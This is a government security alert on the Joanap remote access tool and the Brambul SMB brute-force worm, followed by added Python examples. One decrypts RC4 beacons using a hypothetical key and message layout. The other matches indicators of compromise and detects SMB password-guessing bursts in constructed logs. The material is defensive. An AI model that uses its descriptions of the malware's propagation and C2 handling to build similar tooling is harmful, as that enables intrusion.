Original release date: May 29, 2018 | Last revised: May 31, 2018 Systems Affected Network systems Overview This joint Technical Alert (TA) is the result of analytic efforts between the Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI). Working with U.S. government partners, DHS and FBI identified Internet Protocol (IP) addresses and other indicators of compromise (IOCs) associated with two families of malware used by the North Korean government: a remote access tool (RAT), commonly known as Joanap; and a Server Message Block (SMB) worm, commonly known as Brambul. The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA. For more information on HIDDEN COBRA activity, visit https://www.us-cert.gov/hiddencobra . FBI has high confidence that HIDDEN COBRA actors are using the IP addresses—listed in this report’s IOC files—to maintain a presence on victims’ networks and enable network exploitation. DHS and FBI are distributing these IP addresses and other IOCs to enable network defense and reduce exposure to any North Korean government malicious cyber activity. This alert also includes suggested response actions to the IOCs provided, recommended mitigation techniques, and information on how to report incidents. If users or administrators detect activity associated with these malware families, they should immediately flag it, report it to the DHS National Cybersecurity and Communications Integration Center (NCCIC) or the FBI Cyber Watch (CyWatch), and give it the highest priority for enhanced mitigation. See the following links for a downloadable copy of IOCs: IOCs (.csv) IOCs (.stix) NCCIC conducted analysis on four malware samples and produced a Malware Analysis Report (MAR). MAR-10135536.3 – RAT/Worm examines the tactics, techniques, and procedures observed in the malware. Visit MAR-10135536.3 – HIDDEN COBRA RAT/Worm for the report and associated IOCs. 
Description According to reporting of trusted third parties, HIDDEN COBRA actors have likely been using both Joanap and Brambul malware since at least 2009 to target multiple victims globally and in the United States—including the media, aerospace, financial, and critical infrastructure sectors. Users and administrators should review the information related to Joanap and Brambul from the Operation Blockbuster Destructive Malware Report [1] in conjunction with the IP addresses listed in the .csv and .stix files provided within this alert. Like many of the families of malware used by HIDDEN COBRA actors, Joanap, Brambul, and other previously reported custom malware tools, may be found on compromised network nodes. Each malware tool has different purposes and functionalities. Joanap malware is a fully functional RAT that is able to receive multiple commands, which can be issued by HIDDEN COBRA actors remotely from a command and control server. Joanap typically infects a system as a file dropped by other HIDDEN COBRA malware, which users unknowingly downloaded either when they visit sites compromised by HIDDEN COBRA actors, or when they open malicious email attachments. During analysis of the infrastructure used by Joanap malware, the U.S. Government identified 87 compromised network nodes. The countries in which the infected IP addresses are registered are as follows: Argentina Belgium Brazil Cambodia China Colombia Egypt India Iran Jordan Pakistan Saudi Arabia Spain Sri Lanka Sweden Taiwan Tunisia Malware often infects servers and systems without the knowledge of system users and owners. If the malware can establish persistence, it could move laterally through a victim’s network and any connected networks to infect nodes beyond those identified in this alert. Brambul malware is a brute-force authentication worm that spreads through SMB shares. SMBs enable shared access to files between users on a network. 
Brambul typically spreads by using a list of hard-coded login credentials to launch a brute-force password attack against SMB services, gaining access to a victim's networks.

Technical Details

Joanap

Joanap is a two-stage malware used to establish peer-to-peer communications and to manage botnets designed to enable other operations. Joanap provides HIDDEN COBRA actors with the ability to exfiltrate data, drop and run secondary payloads, and initialize proxy communications on a compromised Windows device. Other notable functions include file management, process management, creation and deletion of directories, and node management.

Analysis indicates the malware encrypts its communication with HIDDEN COBRA actors using Rivest Cipher 4 (RC4). Once installed, the malware creates a log entry within the Windows System Directory in a file named mssscardprv.ax. HIDDEN COBRA actors use this file to capture and store victim information such as the host IP address, host name, and the current system time.

Brambul

Brambul is a malicious Windows 32-bit SMB worm that runs as a service dynamic link library (DLL) or as a portable executable (PE) file, often dropped and installed onto victims' networks by dropper malware. When executed, the malware attempts to establish contact with victim systems and IP addresses on the victims' local subnets. If successful, it attempts to gain unauthorized access via the SMB protocol (ports 139 and 445) by launching brute-force password attacks using a list of embedded passwords. Additionally, the malware generates random IP addresses for further attacks. Analysts suspect the malware targets insecure or unsecured user accounts and spreads through poorly secured network shares.

Once the malware establishes unauthorized access on a victim's systems, it communicates information about those systems to HIDDEN COBRA actors using malicious email addresses. This information includes the IP address and host name, as well as the username and password, of each victim system. HIDDEN COBRA actors can use this information to remotely access a compromised system via the SMB protocol.

Analysis of a newer variant of Brambul identified the following built-in functions for remote operations: harvesting system information, accepting command-line arguments, generating and executing a suicide script, propagating across the network using SMB, brute forcing SMB login credentials, and generating Simple Mail Transfer Protocol (SMTP) email messages containing target host system information.

Detection and Response

This alert's IOC files provide HIDDEN COBRA IOCs related to Joanap and Brambul... (more)
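The alert states only that Joanap protects its command-and-control traffic with RC4; it does not publish the key or the message layout. The following is an added example, not code from the alert or from the malware analysis report: a plain RC4 (KSA plus PRGA) implementation of the kind an analyst keeps at hand to decrypt a captured blob once the key has been pulled out of a sample. The key and the pipe-separated beacon format are assumptions for illustration; the beacon fields (host IP, host name, system time) are the ones the alert says Joanap records.

```python
"""Added example (not from TA18-149A): RC4 routines for decrypting captured
RC4-protected C2 traffic once the key is known from sample analysis.
The key and beacon layout below are hypothetical."""


def rc4_keystream(key: bytes):
    """Generate the RC4 keystream for `key` byte by byte."""
    # Key-scheduling algorithm (KSA): permute S under the key.
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    # Pseudo-random generation algorithm (PRGA): emit keystream bytes.
    i = j = 0
    while True:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        yield S[(S[i] + S[j]) & 0xFF]


def rc4(key: bytes, data: bytes) -> bytes:
    """XOR `data` with the keystream. RC4 is symmetric: the same call
    encrypts and decrypts."""
    if not key:
        raise ValueError("RC4 key must be non-empty")
    ks = rc4_keystream(key)
    return bytes(b ^ next(ks) for b in data)


# Hypothetical beacon format: "<host_ip>|<host_name>|<system_time>".
BEACON_FIELDS = ("host_ip", "host_name", "system_time")


def encode_beacon(host_ip: str, host_name: str, system_time: str) -> bytes:
    """Build a plaintext beacon in the assumed layout."""
    return f"{host_ip}|{host_name}|{system_time}".encode("utf-8")


def decode_beacon(key: bytes, blob: bytes) -> dict:
    """Decrypt a captured beacon and split it into named fields.
    Raises ValueError if the decrypted bytes do not match the layout,
    which in practice means the wrong key was used."""
    fields = rc4(key, blob).decode("utf-8", errors="replace").split("|")
    if len(fields) != len(BEACON_FIELDS):
        raise ValueError("decrypted data is not a recognisable beacon")
    return dict(zip(BEACON_FIELDS, fields))


# Hypothetical key, standing in for one recovered from a sample.
HYPOTHETICAL_KEY = b"recovered-from-sample"


if __name__ == "__main__":
    # Constructed beacon, encrypted and then decrypted with the same key.
    blob = rc4(HYPOTHETICAL_KEY,
               encode_beacon("10.0.0.5", "WORKSTATION-01", "2018-05-29 10:05:00"))
    print(blob.hex())
    print(decode_beacon(HYPOTHETICAL_KEY, blob))
```

Because this scheme has no per-message nonce, every beacon under one key is XORed with the same keystream, so XORing two captured ciphertexts gives the XOR of the two plaintexts; that is why a single recovered key usually decrypts an entire capture, and why a wrong key shows up as garbage rather than as a near miss.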
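Two checks follow from the alert: matching the distributed IOC IP addresses against outbound connection logs (the response action in the Overview), and looking for the behaviour Brambul produces on a victim network, a burst of failed SMB logons (Windows Event ID 4625, logon type 3, ports 139/445) from one source against several accounts. The block below is an added example written here to illustrate both, not code from the alert. Every IP address, CSV row and event record in it is constructed (RFC 5737 documentation ranges) and is not an indicator from the alert; the CSV column names are assumed.

```python
"""Added example (not from TA18-149A): IOC matching and Brambul-style SMB
brute-force detection over constructed logs. All indicators are fake."""
import csv
import io
import ipaddress
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed IOC file in an alert-like CSV layout (columns are assumed).
IOC_CSV = """indicator,type,description
203.0.113.45,ipv4,Joanap C2 (constructed)
198.51.100.7,ipv4,Brambul drop host (constructed)
"""

# Constructed firewall log: "<timestamp> <src> -> <dst>:<port>"
CONN_LOG = """2018-05-29T10:01:02 10.0.0.5 -> 203.0.113.45:443
2018-05-29T10:01:09 10.0.0.5 -> 192.0.2.10:443
2018-05-29T10:02:15 10.0.0.8 -> 198.51.100.7:80
"""

# Constructed Windows Security 4625 (failed logon) events, logon type 3:
# (timestamp, source IP, target account, destination port)
FAILED_LOGONS = [
    ("2018-05-29T10:05:00", "10.0.0.21", "administrator", 445),
    ("2018-05-29T10:05:01", "10.0.0.21", "admin", 445),
    ("2018-05-29T10:05:01", "10.0.0.21", "guest", 445),
    ("2018-05-29T10:05:02", "10.0.0.21", "backup", 139),
    ("2018-05-29T10:05:03", "10.0.0.21", "administrator", 445),
    ("2018-05-29T10:05:04", "10.0.0.21", "user", 445),
    ("2018-05-29T10:30:00", "10.0.0.9", "jsmith", 445),  # one typo, benign
]


def parse_ioc_csv(text: str) -> set:
    """Return the set of IPv4 indicators from an alert-style CSV."""
    iocs = set()
    for row in csv.DictReader(io.StringIO(text)):
        if row.get("type") == "ipv4":
            iocs.add(str(ipaddress.ip_address(row["indicator"].strip())))
    return iocs


def match_iocs(conn_log: str, iocs: set) -> list:
    """Return (timestamp, src, dst) for each connection to an IOC address."""
    hits = []
    for line in conn_log.splitlines():
        ts, src, _, dst_port = line.split()
        dst = dst_port.rsplit(":", 1)[0]
        if dst in iocs:
            hits.append((ts, src, dst))
    return hits


def detect_smb_bruteforce(events, window=timedelta(minutes=5), threshold=5) -> dict:
    """Flag sources with >= `threshold` failed SMB logons inside `window`.

    A worm cycling an embedded password list produces a tight burst of
    4625 events from one source against several accounts, which is what
    the sliding window below picks out. Returns
    {src: {"attempts": n, "accounts": [sorted distinct accounts]}}."""
    by_src = defaultdict(list)
    for ts, src, user, port in events:
        if port in (139, 445):
            by_src[src].append((datetime.fromisoformat(ts), user))
    flagged = {}
    for src, attempts in by_src.items():
        attempts.sort()
        best = None
        start = 0
        for end in range(len(attempts)):
            while attempts[end][0] - attempts[start][0] > window:
                start += 1
            count = end - start + 1
            if count >= threshold and (best is None or count > best[0]):
                best = (count, start, end)
        if best:
            count, s, e = best
            accounts = sorted({u for _, u in attempts[s:e + 1]})
            flagged[src] = {"attempts": count, "accounts": accounts}
    return flagged


if __name__ == "__main__":
    print("IOC hits:", match_iocs(CONN_LOG, parse_ioc_csv(IOC_CSV)))
    print("SMB brute force:", detect_smb_bruteforce(FAILED_LOGONS))
```

The threshold and window are deliberately conservative; a single user mistyping a password twice never trips them, whereas the constructed 10.0.0.21 source, which tries five accounts in four seconds, does. On a real estate feed the same logic applies to any 4625 source with logon type 3, and the IOC match should be run against DNS and proxy logs as well as the firewall.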

Posted on 29 May 2018 3:18 pm